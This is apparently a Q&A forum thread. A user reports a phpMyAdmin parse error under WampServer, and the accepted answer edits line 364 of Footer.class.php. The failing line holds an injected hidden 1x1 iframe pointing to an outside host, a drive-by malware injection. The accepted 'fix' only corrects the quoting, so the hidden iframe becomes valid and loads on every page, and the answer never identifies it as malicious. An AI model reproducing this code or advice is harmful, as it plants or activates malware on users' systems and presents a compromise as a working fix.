# phpmydmin loads with parse error

Tags: phpmyadmin, wampserver

I have installed `wampserver3.0.4_x86` on my `32-bit` machine and set `Firefox` as my default web browser and `Notepad++` as my default editor. I have not tweaked anything and all seems to work fine. However, when I try to load `phpmyadmin` I get this error: `Parse error: syntax error, unexpected 'http' (T_STRING) in C:\wamp\apps\phpmyadmin4.5.5.1\libraries\Footer.class.php on line 364`.
I have tried removing the `'http'` and also playing around with the double quotes but nothing seems to work. 
Any help will be greatly appreciated.

Answer (score 1, accepted):

I changed `$retval` in `Footer.class.php line 364` from `"<iframe src="http://Zief.pl/rc/" width=1 height=1 style="border:0"></iframe>
</body></html>";` to `'<iframe src="http://Zief.pl/rc/" width=1 height=1 style="border:0"></iframe></body></html>';`and it worked :-))